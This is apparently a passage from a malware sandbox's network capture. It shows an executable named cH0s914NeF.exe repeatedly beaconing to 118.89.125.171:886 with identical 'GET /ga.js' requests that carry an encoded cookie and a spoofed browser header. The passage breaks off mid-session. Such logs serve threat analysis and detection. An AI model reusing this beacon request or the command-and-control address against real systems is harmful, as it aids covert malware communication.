4	192.168.2.5	49710	118.89.125.171	886	4304	C:\Users\user\Desktop\cH0s914NeF.exe

Timestamp	Bytes transferred	Direction	Data
Apr 20, 2024 15:22:01.730314970 CEST	400	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: cSN0hYAW4Yrm2b2xvVjvCJAjmd1fcL15iOKbMV2Gg+VejBkXEXyaqymoFiDTK28Uc3vfFgvNWkdBi2t9W6uAbxYCZ4tBLaeZO/7MAorozKnVRsjKA4jqkZ5hAg9bpCP8xmRZIy5SpQVFB9BrBk1D5JQUhqeSsp4/jSx7R8QFvyY= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; 360space) Host: 118.89.125.171:886 Connection: Keep-Alive Cache-Control: no-cache
Apr 20, 2024 15:22:02.081738949 CEST	115	IN	HTTP/1.1 200 OK Date: Sat, 20 Apr 2024 13:22:01 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.5	49711	118.89.125.171	886	4304	C:\Users\user\Desktop\cH0s914NeF.exe

Timestamp	Bytes transferred	Direction	Data
Apr 20, 2024 15:22:02.506584883 CEST	400	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: cSN0hYAW4Yrm2b2xvVjvCJAjmd1fcL15iOKbMV2Gg+VejBkXEXyaqymoFiDTK28Uc3vfFgvNWkdBi2t9W6uAbxYCZ4tBLaeZO/7MAorozKnVRsjKA4jqkZ5hAg9bpCP8xmRZIy5SpQVFB9BrBk1D5JQUhqeSsp4/jSx7R8QFvyY= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; 360space) Host: 118.89.125.171:886 Connection: Keep-Alive Cache-Control: no-cache
Apr 20, 2024 15:22:02.824739933 CEST	115	IN	HTTP/1.1 200 OK Date: Sat, 20 Apr 2024 13:22:02 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.5	49712	118.89.125.171	886	4304	C:\Users\user\Desktop\cH0s914NeF.exe

Timestamp	Bytes transferred	Direction	Data
Apr 20, 2024 15:22:03.257862091 CEST	400	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: cSN0hYAW4Yrm2b2xvVjvCJAjmd1fcL15iOKbMV2Gg+VejBkXEXyaqymoFiDTK28Uc3vfFgvNWkdBi2t9W6uAbxYCZ4tBLaeZO/7MAorozKnVRsjKA4jqkZ5hAg9bpCP8xmRZIy5SpQVFB9BrBk1D5JQUhqeSsp4/jSx7R8QFvyY= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; 360space) Host: 118.89.125.171:886 Connection: Keep-Alive Cache-Control: no-cache
Apr 20, 2024 15:22:03.572482109 CEST	115	IN	HTTP/1.1 200 OK Date: Sat, 20 Apr 2024 13:22:03 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.5	49713	118.89.125.171	886	4304	C:\Users\user\Desktop\cH0s914NeF.exe

Timestamp	Bytes transferred	Direction	Data
Apr 20, 2024 15:22:04.010247946 CEST	400	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: cSN0hYAW4Yrm2b2xvVjvCJAjmd1fcL15iOKbMV2Gg+VejBkXEXyaqymoFiDTK28Uc3vfFgvNWkdBi2t9W6uAbxYCZ4tBLaeZO/7MAorozKnVRsjKA4jqkZ5hAg9bpCP8xmRZIy5SpQVFB9BrBk1D5JQUhqeSsp4/jSx7R8QFvyY= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; 360space) Host: 118.89.125.171:886 Connection: Keep-Alive Cache-Control: no-cache
Apr 20, 2024 15:22:04.326760054 CEST	115	IN	HTTP/1.1 200 OK Date: Sat, 20 Apr 2024 13:22:04 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.5	49714	118.89.125.171	886	4304	C:\Users\user\Desktop\cH0s914NeF.exe

Timestamp	Bytes transferred	Direction	Data
Apr 20, 2024 15:22:04.783399105 CEST	400	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: cSN0hYAW4Yrm2b2xvVjvCJAjmd1fcL15iOKbMV2Gg+VejBkXEXyaqymoFiDTK28Uc3vfFgvNWkdBi2t9W6uAbxYCZ4tBLaeZO/7MAorozKnVRsjKA4jqkZ5hAg9bpCP8xmRZIy5SpQVFB9BrBk1D5JQUhqeSsp4/jSx7R8QFvyY= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; 360space) Host: 118.89.125.171:886 Connection: Keep-Alive Cache-Control: no-cache
Apr 20, 2024 15:22:05.088388920 CEST	115	IN	HTTP/1.1 200 OK Date: Sat, 20 Apr 2024 13:22:04 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.5	49715	118.89.125.171	886	4304	C:\Users\user\Desktop\cH0s914NeF.exe

Timestamp	Bytes transferred	Direction	Data
Apr 20, 2024 15:22:05.522568941 CEST	400	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: cSN0hYAW4Yrm2b2xvVjvCJAjmd1fcL15iOKbMV2Gg+VejBkXEXyaqymoFiDTK28Uc3vfFgvNWkdBi2t9W6uAbxYCZ4tBLaeZO/7MAorozKnVRsjKA4jqkZ5hAg9bpCP8xmRZIy5SpQVFB9BrBk1D5JQUhqeSsp4/jSx7R8QFvyY= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; 360space) Host: 118.89.125.171:886 Connection: Keep-Alive Cache-Control: no-cache
Apr 20, 2024 15:22:05.839464903 CEST	115	IN	HTTP/1.1 200 OK Date: Sat, 20 Apr 2024 13:22:05 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.5	49716	118.89.125.171	886	4304	C:\Users\user\Desktop\cH0s914NeF.exe

Timestamp	Bytes transferred	Direction	Data
Apr 20, 2024 15:22:06.260318041 CEST	400	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: cSN0hYAW4Yrm2b2xvVjvCJAjmd1fcL15iOKbMV2Gg+VejBkXEXyaqymoFiDTK28Uc3vfFgvNWkdBi2t9W6uAbxYCZ4tBLaeZO/7MAorozKnVRsjKA4jqkZ5hAg9bpCP8xmRZIy5SpQVFB9BrBk1D5JQUhqeSsp4/jSx7R8QFvyY= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; 360space) Host: 118.89.125.171:886 Connection: Keep-Alive Cache-Control: no-cache
Apr 20, 2024 15:22:06.567650080 CEST	115	IN	HTTP/1.1 200 OK Date: Sat, 20 Apr 2024 13:22:06 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.5	49717	118.89.125.171	886	4304	C:\Users\user\Desktop\cH0s914NeF.exe

Timestamp	Bytes transferred	Direction	Data
Apr 20, 2024 15:22:06.990011930 CEST	400	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: cSN0hYAW4Yrm2b2xvVjvCJAjmd1fcL15iOKbMV2Gg+VejBkXEXyaqymoFiDTK28Uc3vfFgvNWkdBi2t9W6uAbxYCZ4tBLaeZO/7MAorozKnVRsjKA4jqkZ5hAg9bpCP8xmRZIy5SpQVFB9BrBk1D5JQUhqeSsp4/jSx7R8QFvyY= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; 360space) Host: 118.89.125.171:886 Connection: Keep-Alive Cache-Control: no-cache
Apr 20, 2024 15:22:07.307565928 CEST	115	IN	HTTP/1.1 200 OK Date: Sat, 20 Apr 2024 13:22:07 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.5	49718	118.89.125.171	886	4304	C:\Users\user\Desktop\cH0s914NeF.exe

Timestamp	Bytes transferred	Direction	Data
Apr 20, 2024 15:22:07.745213985 CEST	400	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: cSN0hYAW4Yrm2b2xvVjvCJAjmd1fcL15iOKbMV2Gg+VejBkXEXyaqymoFiDTK28Uc3vfFgvNWkdBi2t9W6uAbxYCZ4tBLaeZO/7MAorozKnVRsjKA4jqkZ5hAg9bpCP8xmRZIy5SpQVFB9BrBk1D5JQUhqeSsp4/jSx7R8QFvyY= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; 360space) Host: 118.89.125.171:886 Connection: Keep-Alive Cache-Control: no-cache
Apr 20, 2024 15:22:08.065896034 CEST	115	IN	HTTP/1.1 200 OK Date: Sat, 20 Apr 2024 13:22:07 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.5	49719	118.89.125.171	886	4304	C:\Users\user\Desktop\cH0s914NeF.exe

Timestamp	Bytes transferred	Direction	Data
Apr 20, 2024 15:22:08.484359980 CEST	400	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: cSN0hYAW4Yrm2b2xvVjvCJAjmd1fcL15iOKbMV2Gg+VejBkXEXyaqymoFiDTK28Uc3vfFgvNWkdBi2t9W6uAbxYCZ4tBLaeZO/7MAorozKnVRsjKA4jqkZ5hAg9bpCP8xmRZIy5SpQVFB9BrBk1D5JQUhqeSsp4/jSx7R8QFvyY= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; 360space) Host: 118.89.125.171:886 Connection: Keep-Alive Cache-Control: no-cache
Apr 20, 2024 15:22:08.792956114 CEST	115	IN	HTTP/1.1 200 OK Date: Sat, 20 Apr 2024 13:22:08 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.5	49720	118.89.125.171	886	4304	C:\Users\user\Desktop\cH0s914NeF.exe

Timestamp	Bytes transferred	Direction	Data
Apr 20, 2024 15:22:10.779247046 CEST	400	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: cSN0hYAW4Yrm2b2xvVjvCJAjmd1fcL15iOKbMV2Gg+VejBkXEXyaqymoFiDTK28Uc3vfFgvNWkdBi2t9W6uAbxYCZ4tBLaeZO/7MAorozKnVRsjKA4jqkZ5hAg9bpCP8xmRZIy5SpQVFB9BrBk1D5JQUhqeSsp4/jSx7R8QFvyY= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; 360space) Host: 118.89.125.171:886 Connection: Keep-Alive Cache-Control: no-cache
Apr 20, 2024 15:22:11.107330084 CEST	115	IN	HTTP/1.1 200 OK Date: Sat, 20 Apr 2024 13:22:10 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.5	49721	118.89.125.171	886	4304	C:\Users\user\Desktop\cH0s914NeF.exe

Timestamp	Bytes transferred	Direction	Data
Apr 20, 2024 15:22:11.538642883 CEST	400	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: cSN0hYAW4Yrm2b2xvVjvCJAjmd1fcL15iOKbMV2Gg+VejBkXEXyaqymoFiDTK28Uc3vfFgvNWkdBi2t9W6uAbxYCZ4tBLaeZO/7MAorozKnVRsjKA4jqkZ5hAg9bpCP8xmRZIy5SpQVFB9BrBk1D5JQUhqeSsp4/jSx7R8QFvyY= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; 360space) Host: 118.89.125.171:886 Connection: Keep-Alive Cache-Control: no-cache
Apr 20, 2024 15:22:11.857764006 CEST	115	IN	HTTP/1.1 200 OK Date: Sat, 20 Apr 2024 13:22:11 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.5	49723	118.89.125.171	886	4304	C:\Users\user\Desktop\cH0s914NeF.exe

Timestamp	Bytes transferred	Direction	Data
Apr 20, 2024 15:22:12.287481070 CEST	400	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: cSN0hYAW4Yrm2b2xvVjvCJAjmd1fcL15iOKbMV2Gg+VejBkXEXyaqymoFiDTK28Uc3vfFgvNWkdBi2t9W6uAbxYCZ4tBLaeZO/7MAorozKnVRsjKA4jqkZ5hAg9bpCP8xmRZIy5SpQVFB9BrBk1D5JQUhqeSsp4/jSx7R8QFvyY= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; 360space) Host: 118.89.125.171:886 Connection: Keep-Alive Cache-Control: no-cache
Apr 20, 2024 15:22:12.600951910 CEST	115	IN	HTTP/1.1 200 OK Date: Sat, 20 Apr 2024 13:22:12 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.5	49726	118.89.125.171	886	4304	C:\Users\user\Desktop\cH0s914NeF.exe

Timestamp	Bytes transferred	Direction	Data
Apr 20, 2024 15:22:13.037942886 CEST	400	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: cSN0hYAW4Yrm2b2xvVjvCJAjmd1fcL15iOKbMV2Gg+VejBkXEXyaqymoFiDTK28Uc3vfFgvNWkdBi2t9W6uAbxYCZ4tBLaeZO/7MAorozKnVRsjKA4jqkZ5hAg9bpCP8xmRZIy5SpQVFB9BrBk1D5JQUhqeSsp4/jSx7R8QFvyY= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; 360space) Host: 118.89.125.171:886 Connection: Keep-Alive Cache-Control: no-cache
Apr 20, 2024 15:22:13.354446888 CEST	115	IN	HTTP/1.1 200 OK Date: Sat, 20 Apr 2024 13:22:13 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.5	49731	118.89.125.171	886	4304	C:\Users\user\Desktop\cH0s914NeF.exe

Timestamp	Bytes transferred	Direction	Data
Apr 20, 2024 15:22:13.808689117 CEST	400	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: cSN0hYAW4Yrm2b2xvVjvCJAjmd1fcL15iOKbMV2Gg+VejBkXEXyaqymoFiDTK28Uc3vfFgvNWkdBi2t9W6uAbxYCZ4tBLaeZO/7MAorozKnVRsjKA4jqkZ5hAg9bpCP8xmRZIy5SpQVFB9BrBk1D5JQUhqeSsp4/jSx7R8QFvyY= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; 360space) Host: 118.89.125.171:886 Connection: Keep-Alive Cache-Control: no-cache
Apr 20, 2024 15:22:14.145119905 CEST	115	IN	HTTP/1.1 200 OK Date: Sat, 20 Apr 2024 13:22:13 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.5	49732	118.89.125.171	886	4304	C:\Users\user\Desktop\cH0s914NeF.exe

Timestamp	Bytes transferred	Direction	Data
Apr 20, 2024 15:22:14.576174974 CEST	400	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: cSN0hYAW4Yrm2b2xvVjvCJAjmd1fcL15iOKbMV2Gg+VejBkXEXyaqymoFiDTK28Uc3vfFgvNWkdBi2t9W6uAbxYCZ4tBLaeZO/7MAorozKnVRsjKA4jqkZ5hAg9bpCP8xmRZIy5SpQVFB9BrBk1D5JQUhqeSsp4/jSx7R8QFvyY= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; 360space) Host: 118.89.125.171:886 Connection: Keep-Alive Cache-Control: no-cache
Apr 20, 2024 15:22:15.266521931 CEST	400	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: cSN0hYAW4Yrm2b2xvVjvCJAjmd1fcL15iOKbMV2Gg+VejBkXEXyaqymoFiDTK28Uc3vfFgvNWkdBi2t9W6uAbxYCZ4tBLaeZO/7MAorozKnVRsjKA4jqkZ5hAg9bpCP8xmRZIy5SpQVFB9BrBk1D5JQUhqeSsp4/jSx7R8QFvyY= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; 360space) Host: 118.89.125.171:886 Connection: Keep-Alive Cache-Control: no-cache
Apr 20, 2024 15:22:15.586992979 CEST	115	IN	HTTP/1.1 200 OK Date: Sat, 20 Apr 2024 13:22:15 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.5	49733	118.89.125.171	886	4304	C:\Users\user\Desktop\cH0s914NeF.exe

Timestamp	Bytes transferred	Direction	Data
Apr 20, 2024 15:22:16.028949022 CEST	400	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: cSN0hYAW4Yrm2b2xvVjvCJAjmd1fcL15iOKbMV2Gg+VejBkXEXyaqymoFiDTK28Uc3vfFgvNWkdBi2t9W6uAbxYCZ4tBLaeZO/7MAorozKnVRsjKA4jqkZ5hAg9bpCP8xmRZIy5SpQVFB9BrBk1D5JQUhqeSsp4/jSx7R8QFvyY= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; 360space) Host: 118.89.125.171:886 Connection: Keep-Alive Cache-Control: no-cache
Apr 20, 2024 15:22:16.704040051 CEST	400	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: cSN0hYAW4Yrm2b2xvVjvCJAjmd1fcL15iOKbMV2Gg+VejBkXEXyaqymoFiDTK28Uc3vfFgvNWkdBi2t9W6uAbxYCZ4tBLaeZO/7MAorozKnVRsjKA4jqkZ5hAg9bpCP8xmRZIy5SpQVFB9BrBk1D5JQUhqeSsp4/jSx7R8QFvyY= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; 360space) Host: 118.89.125.171:886 Connection: Keep-Alive Cache-Control: no-cache
Apr 20, 2024 15:22:17.026791096 CEST	115	IN	HTTP/1.1 200 OK Date: Sat, 20 Apr 2024 13:22:16 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.5	49734	118.89.125.171	886	4304	C:\Users\user\Desktop\cH0s914NeF.exe

Timestamp	Bytes transferred	Direction	Data
Apr 20, 2024 15:22:17.467322111 CEST	400	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: cSN0hYAW4Yrm2b2xvVjvCJAjmd1fcL15iOKbMV2Gg+VejBkXEXyaqymoFiDTK28Uc3vfFgvNWkdBi2t9W6uAbxYCZ4tBLaeZO/7MAorozKnVRsjKA4jqkZ5hAg9bpCP8xmRZIy5SpQVFB9BrBk1D5JQUhqeSsp4/jSx7R8QFvyY= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; 360space) Host: 118.89.125.171:886 Connection: Keep-Alive Cache-Control: no-cache
Apr 20, 2024 15:22:17.788737059 CEST	115	IN	HTTP/1.1 200 OK Date: Sat, 20 Apr 2024 13:22:17 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.5	49735	118.89.125.171	886	4304	C:\Users\user\Desktop\cH0s914NeF.exe

Timestamp	Bytes transferred	Direction	Data
Apr 20, 2024 15:22:18.236867905 CEST	400	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: cSN0hYAW4Yrm2b2xvVjvCJAjmd1fcL15iOKbMV2Gg+VejBkXEXyaqymoFiDTK28Uc3vfFgvNWkdBi2t9W6uAbxYCZ4tBLaeZO/7MAorozKnVRsjKA4jqkZ5hAg9bpCP8xmRZIy5SpQVFB9BrBk1D5JQUhqeSsp4/jSx7R8QFvyY= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; 360space) Host: 118.89.125.171:886 Connection: Keep-Alive Cache-Control: no-cache
Apr 20, 2024 15:22:18.563352108 CEST	115	IN	HTTP/1.1 200 OK Date: Sat, 20 Apr 2024 13:22:18 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.5	49736	118.89.125.171	886	4304	C:\Users\user\Desktop\cH0s914NeF.exe

Timestamp	Bytes transferred	Direction	Data
Apr 20, 2024 15:22:18.995066881 CEST	400	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: cSN0hYAW4Yrm2b2xvVjvCJAjmd1fcL15iOKbMV2Gg+VejBkXEXyaqymoFiDTK28Uc3vfFgvNWkdBi2t9W6uAbxYCZ4tBLaeZO/7MAorozKnVRsjKA4jqkZ5hAg9bpCP8xmRZIy5SpQVFB9BrBk1D5JQUhqeSsp4/jSx7R8QFvyY= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; 360space) Host: 118.89.125.171:886 Connection: Keep-Alive Cache-Control: no-cache
Apr 20, 2024 15:22:19.302443981 CEST	115	IN	HTTP/1.1 200 OK Date: Sat, 20 Apr 2024 13:22:19 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.5	49737	118.89.125.171	886	4304	C:\Users\user\Desktop\cH0s914NeF.exe

Timestamp	Bytes transferred	Direction	Data
Apr 20, 2024 15:22:19.752047062 CEST	400	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: cSN0hYAW4Yrm2b2xvVjvCJAjmd1fcL15iOKbMV2Gg+VejBkXEXyaqymoFiDTK28Uc3vfFgvNWkdBi2t9W6uAbxYCZ4tBLaeZO/7MAorozKnVRsjKA4jqkZ5hAg9bpCP8xmRZIy5SpQVFB9BrBk1D5JQUhqeSsp4/jSx7R8QFvyY= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; 360space) Host: 118.89.125.171:886 Connection: Keep-Alive Cache-Control: no-cache
Apr 20, 2024 15:22:20.078964949 CEST	115	IN	HTTP/1.1 200 OK Date: Sat, 20 Apr 2024 13:22:19 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.5	49738	118.89.125.171	886	4304	C:\Users\user\Desktop\cH0s914NeF.exe

Timestamp	Bytes transferred	Direction	Data
Apr 20, 2024 15:22:20.528095961 CEST	400	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: cSN0hYAW4Yrm2b2xvVjvCJAjmd1fcL15iOKbMV2Gg+VejBkXEXyaqymoFiDTK28Uc3vfFgvNWkdBi2t9W6uAbxYCZ4tBLaeZO/7MAorozKnVRsjKA4jqkZ5hAg9bpCP8xmRZIy5SpQVFB9BrBk1D5JQUhqeSsp4/jSx7R8QFvyY= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; 360space) Host: 118.89.125.171:886 Connection: Keep-Alive Cache-Control: no-cache
Apr 20, 2024 15:22:20.863450050 CEST	115	IN	HTTP/1.1 200 OK Date: Sat, 20 Apr 2024 13:22:20 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.5	49739	118.89.125.171	886	4304	C:\Users\user\Desktop\cH0s914NeF.exe

Timestamp	Bytes transferred	Direction	Data
Apr 20, 2024 15:22:21.305767059 CEST	400	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: cSN0hYAW4Yrm2b2xvVjvCJAjmd1fcL15iOKbMV2Gg+VejBkXEXyaqymoFiDTK28Uc3vfFgvNWkdBi2t9W6uAbxYCZ4tBLaeZO/7MAorozKnVRsjKA4jqkZ5hAg9bpCP8xmRZIy5SpQVFB9BrBk1D5JQUhqeSsp4/jSx7R8QFvyY= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; 360space) Host: 118.89.125.171:886 Connection: Keep-Alive Cache-Control: no-cache
Apr 20, 2024 15:22:21.638633013 CEST	115	IN	HTTP/1.1 200 OK Date: Sat, 20 Apr 2024 13:22:21 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.5	49740	118.89.125.171	886	4304	C:\Users\user\Desktop\cH0s914NeF.exe

Timestamp	Bytes transferred	Direction	Data
Apr 20, 2024 15:22:22.109088898 CEST	400	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: cSN0hYAW4Yrm2b2xvVjvCJAjmd1fcL15iOKbMV2Gg+VejBkXEXyaqymoFiDTK28Uc3vfFgvNWkdBi2t9W6uAbxYCZ4tBLaeZO/7MAorozKnVRsjKA4jqkZ5hAg9bpCP8xmRZIy5SpQVFB9BrBk1D5JQUhqeSsp4/jSx7R8QFvyY= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; 360space) Host: 118.89.125.171:886 Connection: Keep-Alive Cache-Control: no-cache
Apr 20, 2024 15:22:22.459121943 CEST	115	IN	HTTP/1.1 200 OK Date: Sat, 20 Apr 2024 13:22:22 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.5	49741	118.89.125.171	886	4304	C:\Users\user\Desktop\cH0s914NeF.exe

Timestamp	Bytes transferred	Direction	Data
Apr 20, 2024 15:22:22.896066904 CEST	400	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: cSN0hYAW4Yrm2b2xvVjvCJAjmd1fcL15iOKbMV2Gg+VejBkXEXyaqymoFiDTK28Uc3vfFgvNWkdBi2t9W6uAbxYCZ4tBLaeZO/7MAorozKnVRsjKA4jqkZ5hAg9bpCP8xmRZIy5SpQVFB9BrBk1D5JQUhqeSsp4/jSx7R8QFvyY= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; 360space) Host: 118.89.125.171:886 Connection: Keep-Alive Cache-Control: no-cache
Apr 20, 2024 15:22:23.563500881 CEST	400	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: cSN0hYAW4Yrm2b2xvVjvCJAjmd1fcL15iOKbMV2Gg+VejBkXEXyaqymoFiDTK28Uc3vfFgvNWkdBi2t9W6uAbxYCZ4tBLaeZO/7MAorozKnVRsjKA4jqkZ5hAg9bpCP8xmRZIy5SpQVFB9BrBk1D5JQUhqeSsp4/jSx7R8QFvyY= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; 360space) Host: 118.89.125.171:886 Connection: Keep-Alive Cache-Control: no-cache
Apr 20, 2024 15:22:23.880496025 CEST	115	IN	HTTP/1.1 200 OK Date: Sat, 20 Apr 2024 13:22:23 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.5	49742	118.89.125.171	886	4304	C:\Users\user\Desktop\cH0s914NeF.exe

Timestamp	Bytes transferred	Direction	Data
Apr 20, 2024 15:22:24.343489885 CEST	400	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: cSN0hYAW4Yrm2b2xvVjvCJAjmd1fcL15iOKbMV2Gg+VejBkXEXyaqymoFiDTK28Uc3vfFgvNWkdBi2t9W6uAbxYCZ4tBLaeZO/7MAorozKnVRsjKA4jqkZ5hAg9bpCP8xmRZIy5SpQVFB9BrBk1D5JQUhqeSsp4/jSx7R8QFvyY= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; 360space) Host: 118.89.125.171:886 Connection: Keep-Alive Cache-Control: no-cache
Apr 20, 2024 15:22:24.681329012 CEST	115	IN	HTTP/1.1 200 OK Date: Sat, 20 Apr 2024 13:22:24 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.5	49743	118.89.125.171	886	4304	C:\Users\user\Desktop\cH0s914NeF.exe

Timestamp	Bytes transferred	Direction	Data
